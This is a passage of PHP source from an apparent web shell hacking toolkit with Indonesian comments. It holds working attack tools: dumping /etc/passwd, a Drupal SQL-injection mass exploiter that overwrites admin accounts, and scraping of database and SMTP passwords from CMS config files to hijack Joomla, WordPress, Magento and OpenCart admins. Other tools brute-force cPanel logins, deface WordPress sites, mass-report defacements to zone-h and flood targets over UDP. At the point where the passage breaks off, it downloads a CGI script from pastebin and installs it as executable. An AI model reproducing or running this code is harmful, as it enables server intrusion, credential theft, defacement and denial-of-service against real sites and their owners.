2243. <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
2244. <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
2245. <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
2246. <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
2247. </tr>
2248. </table></center><br>";
2249. if ($_POST['awkuser']) {
2250. echo"<textarea class='inputzbut' cols='65' rows='15'>";
2251. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
2252. echo "</textarea><br>";
2253. }
2254. if ($_POST['systuser']) {
2255. echo"<textarea class='inputzbut' cols='65' rows='15'>";
2256. echo system("ls /var/mail");
2257. echo "</textarea><br>";
2258. }
2259. if ($_POST['passthuser']) {
2260. echo"<textarea class='inputzbut' cols='65' rows='15'>";
2261. echo passthru("ls /var/mail");
2262. echo "</textarea><br>";
2263. }
2264. if ($_POST['exuser']) {
2265. echo"<textarea class='inputzbut' cols='65' rows='15'>";
2266. echo exec("ls /var/mail");
2267. echo "</textarea><br>";
2268. }
2269. if ($_POST['shexuser']) {
2270. echo"<textarea class='inputzbut' cols='65' rows='15'>";
2271. echo shell_exec("ls /var/mail");
2272. echo "</textarea><br>";
2273. }
2274. if($_POST['syst'])
2275. {
2276. echo"<textarea class='inputz' cols='65' rows='15'>";
2277. echo system("cat /etc/passwd");
2278. echo"</textarea><br><br><b></b><br>";
2279. }
2280. if($_POST['passth'])
2281. {
2282. echo"<textarea class='inputz' cols='65' rows='15'>";
2283. echo passthru("cat /etc/passwd");
2284. echo"</textarea><br><br><b></b><br>";
2285. }
2286. if($_POST['ex'])
2287. {
2288. echo"<textarea class='inputz' cols='65' rows='15'>";
2289. echo exec("cat /etc/passwd");
2290. echo"</textarea><br><br><b></b><br>";
2291. }
2292. if($_POST['shex'])
2293. {
2294. echo"<textarea class='inputz' cols='65' rows='15'>";
2295. echo shell_exec("cat /etc/passwd");
2296. echo"</textarea><br><br><b></b><br>";
2297. }
2298. echo '<center>';
2299. if($_POST['melex'])
2300. {
2301. echo"<textarea class='inputz' cols='65' rows='15'>";
2302. for($uid=0;$uid<60000;$uid++){
2303. $ara = posix_getpwuid($uid);
2304. if (!empty($ara)) {
2305. while (list ($key, $val) = each($ara)){
2306. print "$val:";
2307. }
2308. print "\n";
2309. }
2310. }
2311. echo"</textarea><br><br>";
2312. }
2313. }elseif($_GET['do'] == 'drupal') {
2314. echo ' <!Doctype HTML>
2315. <html>
2316. <head>
2317. <title>Drupal Exploit</title>
2318. <style type="text/css">
2319. .mymargin{
2320. margin-top:30px;
2321. font-family: monospace;
2322. }
2323. body, html {
2324. text-align: center;
2325. color: #008000;
2326. margin: 10px auto;
2327. }
2328. a {
2329. color: lime;
2330. text-decoration: none;
2331. }
2332. </style>
2333. </head>
2334. <body>
2335. <h6>Drupal Mass Xploiter</h6>
2336. <center>
2337. <div class="mymargin">
2338. <center>
2339. <form method="POST" action="">
2340. <font color="#008000">Target :</font> <br>
2341. <textarea name="url" placeholder="Example: www.site.com" style="resize: none; border: 1px solid green; color: #bb0000; background: transparent; margin: 5px auto; padding-left: 5px; width: 500px; height: 250px;"></textarea><br>
2342. <input style="border: 1px solid #008000; color: #bb0000; background: transparent; margin: 5px; width: 350px; height: 25px;" size="50" type="submit" name="submit" value="Attack">
2343. </form>
2344. <br>';
2345. error_reporting(0);
2346. $submit = $_POST['submit'];
2347. $url = explode("\r\n", $_POST['url']);
2348. if($submit) {
2349. foreach($url as $sites) {
2350. $log = "/user/login";
2351. $holako = "/?q=user";
2352. $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
2353. $params = array(
2354. 'http' => array(
2355. 'method' => 'POST',
2356. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
2357. 'content' => $post_data
2358. )
2359. );
2360. $ctx = stream_context_create($params);
2361. $data = file_get_contents($sites . '/user/login/', null, $ctx);
2362. echo "<u>Testing user/login</u><br>";
2363. if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
2364. echo "Scanning: <font color=lime>$sites</font><br>";
2365. echo "Status: Successfully Xploited!<br>";
2366. echo "Data=> user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
2367. echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
2368. } else {
2369. echo "Scanning: <font color=lime>$sites</font><br>";
2370. echo "Status: <font color=red>Not Xploited!</font><br><br>";
2371. }
2372. }
2373. }
2374. if($submit) {
2375. foreach($url as $sites) {
2376. $post_data = "name[0;update users set name %3D 'sjteam' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
2377. $params = array(
2378. 'http' => array(
2379. 'method' => 'POST',
2380. 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
2381. 'content' => $post_data
2382. )
2383. );
2384. $ctx = stream_context_create($params);
2385. $data = file_get_contents($sites . '?q=node&destination=node', null, $ctx);
2386. echo '<u>Testing at Index</u><br>';
2387. if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
2388. echo "Scanning: <font color=lime>$sites</font><br>";
2389. echo "Status: Successfully Xploited!<br>";
2390. echo "Data => user: <font color='#ff3'>sjteam</font> | pass: <font color='#ff3'>admin</font><br>";
2391. echo "Login: <a href='$sites$log' target='_blank' style='text-decoration: none'>$sites$log</a><br><br>";
2392. } else {
2393. echo "Scanning: <font color=lime>$sites</font><br>";
2394. echo "Status: <font color=red>Not Xploited!</font><br><br>";
2395. }
2396. }
2397. }
2398. echo '</div>';
2399.  
2400. $Drupal = $_POST['Drupal'];
2401.  
2402.  
2403. if($Drupal == 'Drupal') {
2404.  
2405. $filename = $_FILES['file']['name'];
2406. $filetmp = $_FILES['file']['tmp_name'];
2407.  
2408. echo '<form method="POST" enctype="multipart/form-data">
2409. <input type="file" name="file" />
2410. <input type="submit" value="go" />
2411.  
2412. </form>';
2413. move_uploaded_file($filetmp,$filename);
2414. }
2415. echo'
2416. </body>
2417. </html>';
2418. }elseif($_GET['do'] == 'auto_edit_user') {
2419. if($_POST['hajar']) {
2420. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
2421. echo "username atau password harus lebih dari 6 karakter";
2422. } else {
2423. $user_baru = $_POST['user_baru'];
2424. $pass_baru = md5($_POST['pass_baru']);
2425. $conf = $_POST['config_dir'];
2426. $scan_conf = scandir($conf);
2427. foreach($scan_conf as $file_conf) {
2428. if(!is_file("$conf/$file_conf")) continue;
2429. $config = file_get_contents("$conf/$file_conf");
2430. if(preg_match("/JConfig|joomla/",$config)) {
2431. $dbhost = ambilkata($config,"host = '","'");
2432. $dbuser = ambilkata($config,"user = '","'");
2433. $dbpass = ambilkata($config,"password = '","'");
2434. $dbname = ambilkata($config,"db = '","'");
2435. $dbprefix = ambilkata($config,"dbprefix = '","'");
2436. $prefix = $dbprefix."users";
2437. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2438. $db = mysql_select_db($dbname);
2439. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2440. $result = mysql_fetch_array($q);
2441. $id = $result['id'];
2442. $site = ambilkata($config,"sitename = '","'");
2443. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
2444. echo "Config => ".$file_conf."<br>";
2445. echo "CMS => Joomla<br>";
2446. if($site == '') {
2447. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
2448. } else {
2449. echo "Sitename => $site<br>";
2450. }
2451. if(!$update OR !$conn OR !$db) {
2452. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2453. } else {
2454. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2455. }
2456. mysql_close($conn);
2457. } elseif(preg_match("/WordPress/",$config)) {
2458. $dbhost = ambilkata($config,"DB_HOST', '","'");
2459. $dbuser = ambilkata($config,"DB_USER', '","'");
2460. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2461. $dbname = ambilkata($config,"DB_NAME', '","'");
2462. $dbprefix = ambilkata($config,"table_prefix = '","'");
2463. $prefix = $dbprefix."users";
2464. $option = $dbprefix."options";
2465. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2466. $db = mysql_select_db($dbname);
2467. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2468. $result = mysql_fetch_array($q);
2469. $id = $result[ID];
2470. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2471. $result2 = mysql_fetch_array($q2);
2472. $target = $result2[option_value];
2473. if($target == '') {
2474. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2475. } else {
2476. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
2477. }
2478. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
2479. echo "Config => ".$file_conf."<br>";
2480. echo "CMS => Wordpress<br>";
2481. echo $url_target;
2482. if(!$update OR !$conn OR !$db) {
2483. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2484. } else {
2485. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2486. }
2487. mysql_close($conn);
2488. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
2489. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
2490. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
2491. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
2492. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
2493. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
2494. $prefix = $dbprefix."admin_user";
2495. $option = $dbprefix."core_config_data";
2496. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2497. $db = mysql_select_db($dbname);
2498. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2499. $result = mysql_fetch_array($q);
2500. $id = $result[user_id];
2501. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
2502. $result2 = mysql_fetch_array($q2);
2503. $target = $result2[value];
2504. if($target == '') {
2505. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2506. } else {
2507. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
2508. }
2509. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2510. echo "Config => ".$file_conf."<br>";
2511. echo "CMS => Magento<br>";
2512. echo $url_target;
2513. if(!$update OR !$conn OR !$db) {
2514. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2515. } else {
2516. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2517. }
2518. mysql_close($conn);
2519. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
2520. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
2521. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
2522. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
2523. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
2524. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
2525. $prefix = $dbprefix."user";
2526. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2527. $db = mysql_select_db($dbname);
2528. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2529. $result = mysql_fetch_array($q);
2530. $id = $result[user_id];
2531. $target = ambilkata($config,"HTTP_SERVER', '","'");
2532. if($target == '') {
2533. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2534. } else {
2535. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
2536. }
2537. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2538. echo "Config => ".$file_conf."<br>";
2539. echo "CMS => OpenCart<br>";
2540. echo $url_target;
2541. if(!$update OR !$conn OR !$db) {
2542. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2543. } else {
2544. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2545. }
2546. mysql_close($conn);
2547. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
2548. $dbhost = ambilkata($config,'server = "','"');
2549. $dbuser = ambilkata($config,'username = "','"');
2550. $dbpass = ambilkata($config,'password = "','"');
2551. $dbname = ambilkata($config,'database = "','"');
2552. $prefix = "users";
2553. $option = "identitas";
2554. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2555. $db = mysql_select_db($dbname);
2556. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
2557. $result = mysql_fetch_array($q);
2558. $target = $result[alamat_website];
2559. if($target == '') {
2560. $target2 = $result[url];
2561. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2562. if($target2 == '') {
2563. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2564. } else {
2565. $cek_login3 = file_get_contents("$target2/adminweb/");
2566. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
2567. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
2568. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
2569. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
2570. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
2571. } else {
2572. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2573. }
2574. }
2575. } else {
2576. $cek_login = file_get_contents("$target/adminweb/");
2577. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
2578. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
2579. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
2580. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
2581. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
2582. } else {
2583. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2584. }
2585. }
2586. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
2587. echo "Config => ".$file_conf."<br>";
2588. echo "CMS => Lokomedia<br>";
2589. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
2590. echo $url_target2;
2591. } else {
2592. echo $url_target;
2593. }
2594. if(!$update OR !$conn OR !$db) {
2595. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2596. } else {
2597. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2598. }
2599. mysql_close($conn);
2600. }
2601. }
2602. }
2603. } else {
2604. echo "<center>
2605. <h1>Auto Edit User Config</h1>
2606. <form method='post'>
2607. DIR Config: <br>
2608. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2609. Set User & Pass: <br>
2610. <input type='text' name='user_baru' value='pr!v@t3' placeholder='user_baru'><br>
2611. <input type='text' name='pass_baru' value='pr!v@t3' placeholder='pass_baru'><br>
2612. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
2613. </form><br>
2614. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2615. ";
2616. }
2617. } elseif($_GET['do'] == 'cpanel') {
2618. if($_POST['crack']) {
2619. $usercp = explode("\r\n", $_POST['user_cp']);
2620. $passcp = explode("\r\n", $_POST['pass_cp']);
2621. $i = 0;
2622. foreach($usercp as $ucp) {
2623. foreach($passcp as $pcp) {
2624. if(@mysql_connect('localhost', $ucp, $pcp)) {
2625. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
2626. } else {
2627. $_SESSION[$ucp] = "1";
2628. $_SESSION[$pcp] = "1";
2629. if($ucp == '' || $pcp == '') {
2630.  
2631. } else {
2632. $i++;
2633. if(function_exists('posix_getpwuid')) {
2634. $domain_cp = file_get_contents("/etc/named.conf");
2635. if($domain_cp == '') {
2636. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
2637. } else {
2638. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
2639. foreach($domains_cp[1] as $dj) {
2640. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
2641. $user_cp_url = $user_cp_url['name'];
2642. if($user_cp_url == $ucp) {
2643. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
2644. break;
2645. }
2646. }
2647. }
2648. } else {
2649. $dom = "<font color=red>function is Disable by system</font>";
2650. }
2651. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
2652. }
2653. }
2654. }
2655. }
2656. }
2657. if($i == 0) {
2658. } else {
2659. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>pr!v@t3.</font>";
2660. }
2661. } else {
2662. echo "<center>
2663. <form method='post'>
2664. USER: <br>
2665. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
2666. $_usercp = fopen("/etc/passwd","r");
2667. while($getu = fgets($_usercp)) {
2668. if($getu == '' || !$_usercp) {
2669. echo "<font color=red>Can't read /etc/passwd</font>";
2670. } else {
2671. preg_match_all("/(.*?):x:/", $getu, $u);
2672. foreach($u[1] as $user_cp) {
2673. if(is_dir("/home/$user_cp/public_html")) {
2674. echo "$user_cp\n";
2675. }
2676. }
2677. }
2678. }
2679. echo "</textarea><br>
2680. PASS: <br>
2681. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
2682. function cp_pass($dir) {
2683. $pass = "";
2684. $dira = scandir($dir);
2685. foreach($dira as $dirb) {
2686. if(!is_file("$dir/$dirb")) continue;
2687. $ambil = file_get_contents("$dir/$dirb");
2688. if(preg_match("/WordPress/", $ambil)) {
2689. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
2690. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
2691. $pass .= ambilkata($ambil,"password = '","'")."\n";
2692. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
2693. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
2694. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
2695. $pass .= ambilkata($ambil,'password = "','"')."\n";
2696. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
2697. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
2698. } elseif(preg_match("/^[client]$/", $ambil)) {
2699. preg_match("/password=(.*?)/", $ambil, $pass1);
2700. if(preg_match('/"/', $pass1[1])) {
2701. $pass1[1] = str_replace('"', "", $pass1[1]);
2702. $pass .= $pass1[1]."\n";
2703. } else {
2704. $pass .= $pass1[1]."\n";
2705. }
2706. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
2707. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
2708. }
2709. }
2710. echo $pass;
2711. }
2712. $cp_pass = cp_pass($dir);
2713. echo $cp_pass;
2714. echo "</textarea><br>
2715. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
2716. </form>
2717. <br><span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
2718. }
2719. } elseif($_GET['do'] == 'smtp') {
2720. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
2721. function scj($dir) {
2722. $dira = scandir($dir);
2723. foreach($dira as $dirb) {
2724. if(!is_file("$dir/$dirb")) continue;
2725. $ambil = file_get_contents("$dir/$dirb");
2726. $ambil = str_replace("$", "", $ambil);
2727. if(preg_match("/JConfig|joomla/", $ambil)) {
2728. $smtp_host = ambilkata($ambil,"smtphost = '","'");
2729. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
2730. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
2731. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
2732. $smtp_port = ambilkata($ambil,"smtpport = '","'");
2733. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
2734. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
2735. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
2736. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
2737. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
2738. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
2739. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
2740. }
2741. }
2742. }
2743. $smpt_hunter = scj($dir);
2744. echo $smpt_hunter;
2745. } elseif($_GET['do'] == 'auto_wp') {
2746. if($_POST['hajar']) {
2747. $title = htmlspecialchars($_POST['new_title']);
2748. $pn_title = str_replace(" ", "-", $title);
2749. if($_POST['cek_edit'] == "Y") {
2750. $script = $_POST['edit_content'];
2751. } else {
2752. $script = $title;
2753. }
2754. $conf = $_POST['config_dir'];
2755. $scan_conf = scandir($conf);
2756. foreach($scan_conf as $file_conf) {
2757. if(!is_file("$conf/$file_conf")) continue;
2758. $config = file_get_contents("$conf/$file_conf");
2759. if(preg_match("/WordPress/", $config)) {
2760. $dbhost = ambilkata($config,"DB_HOST', '","'");
2761. $dbuser = ambilkata($config,"DB_USER', '","'");
2762. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2763. $dbname = ambilkata($config,"DB_NAME', '","'");
2764. $dbprefix = ambilkata($config,"table_prefix = '","'");
2765. $prefix = $dbprefix."posts";
2766. $option = $dbprefix."options";
2767. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2768. $db = mysql_select_db($dbname);
2769. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
2770. $result = mysql_fetch_array($q);
2771. $id = $result[ID];
2772. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2773. $result2 = mysql_fetch_array($q2);
2774. $target = $result2[option_value];
2775. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
2776. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
2777. echo "<div style='margin: 5px auto;'>";
2778. if($target == '') {
2779. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
2780. } else {
2781. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
2782. }
2783. if(!$update OR !$conn OR !$db) {
2784. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
2785. } else {
2786. echo "<font color=lime>sukses di ganti.</font><br>";
2787. }
2788. echo "</div>";
2789. mysql_close($conn);
2790. }
2791. }
2792. } else {
2793. echo "<center>
2794. <h1>Auto Edit Title+Content WordPress</h1>
2795. <form method='post'>
2796. DIR Config: <br>
2797. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2798. Set Title: <br>
2799. <input type='text' name='new_title' value='Hacked by pr!v@t3' placeholder='New Title'><br><br>
2800. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
2801. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
2802. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
2803. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
2804. </form>
2805. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2806. ";
2807. }
2808. } elseif($_GET['do'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
2809. } elseif($_GET['do'] == 'zoneh') {
2810. if($_POST['submit']) {
2811. $domain = explode("\r\n", $_POST['url']);
2812. $nick = $_POST['nick'];
2813. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
2814. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
2815. function zoneh($url,$nick) {
2816. $ch = curl_init("http://www.zone-h.com/notify/single");
2817. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2818. curl_setopt($ch, CURLOPT_POST, true);
2819. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
2820. return curl_exec($ch);
2821. curl_close($ch);
2822. }
2823. foreach($domain as $url) {
2824. $zoneh = zoneh($url,$nick);
2825. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
2826. echo "$url -> <font color=lime>OK</font><br>";
2827. } else {
2828. echo "$url -> <font color=red>ERROR</font><br>";
2829. }
2830. }
2831. } else {
2832. echo "<center><form method='post'>
2833. <u>Defacer</u>: <br>
2834. <input type='text' name='nick' size='50' value='pr!v@t3'><br>
2835. <u>Domains</u>: <br>
2836. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
2837. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
2838. </form>";
2839. }
2840. echo "</center>";
2841. }elseif($_GET['do'] == 'ddos'){
2842. echo '
2843. <form action="" method="post">';
2844. echo "
2845. <center><br><br><br>
2846. Your IP: <font color='red'><b>";
2847. echo $my_ip;
2848. echo "
2849. </b></font>&nbsp;(Don't DdoS yourself nub)<br><br>
2850. <center>
2851. <table class='tabnet' style='margin-left:35%;width:30%;padding:0 1px;'>
2852. <th colspan='5'>Ddos Tool</th>
2853. <tr><tr><td>IP Target</td><td>:</td>
2854. <td><input type='text' class='inputz' name='ip' size='48' maxlength='25' value = '0.0.0.0' onblur = 'if ( this.value=='' ) this.value = '0.0.0.0';' onfocus = ' if ( this.value == '0.0.0.0' ) this.value = '';'/>
2855. </td></tr>
2856. <tr><td>Time</td><td>:</td>
2857. <td><input type='text' class='inputz' name='time' size='48' maxlength='25' value = 'time (in seconds)' onblur = 'if ( this.value=='' ) this.value = 'time (in seconds)';' onfocus = ' if ( this.value == 'time (in seconds)' ) this.value = '';'/>
2858. </td></tr>
2859. <tr><td>Port</td><td>:</td>
2860. <td><input type='text' class='inputz' name='port' size='48' maxlength='5' value = 'port' onblur = 'if ( this.value=='' ) this.value = '6969';' onfocus = ' if ( this.value == '6969' ) this.value = '';'/>
2861. </td></tr></tr></b><br><tr><td>
2862. <input type='submit' class='inputzbut' name='fire' value=' Firee !!! ' style='margin-left:200%;'>
2863. <br><br></td></tr></table>
2864. <center>
2865. After initiating the DoS attack, please wait while the browser loads.
2866. </center>
2867.  
2868. </form>
2869. </center>";
2870. $submit = $_POST['fire'];
2871. if (isset($submit)) {
2872. $packets = 0;
2873. $ip = $_POST['ip'];
2874. $rand = $_POST['port'];
2875. set_time_limit(0);
2876. ignore_user_abort(FALSE);
2877. $exec_time = $_POST['time'];
2878. $time = time();
2879. print "Flooded: $ip on port $rand <br><br>";
2880. $max_time = $time + $exec_time;
2881. for ($i = 0;$i < 65535;$i++) {
2882. $out.= "X";
2883. }
2884. while (1) {
2885. $packets++;
2886. if (time() > $max_time) {
2887. break;
2888. }
2889. $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
2890. if ($fp) {
2891. fwrite($fp, $out);
2892. fclose($fp);
2893. }
2894. }
2895. echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s
2896. ";
2897. }
2898. } elseif($_GET['do'] == 'cgi') {
2899. $cgi_dir = mkdir('priv_cgi', 0755);
2900. $file_cgi = "priv_cgi/cgi.izo";
2901. $isi_htcgi = "AddHandler cgi-script .izo";
2902. $htcgi = fopen(".htaccess", "w");
2903. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
2904. $cgi = fopen($file_cgi, "w");
2905. fwrite($cgi, $cgi_script);
2906. fwrite($htcgi, $isi_htcgi);
2907. chmod($file_cgi, 0755);
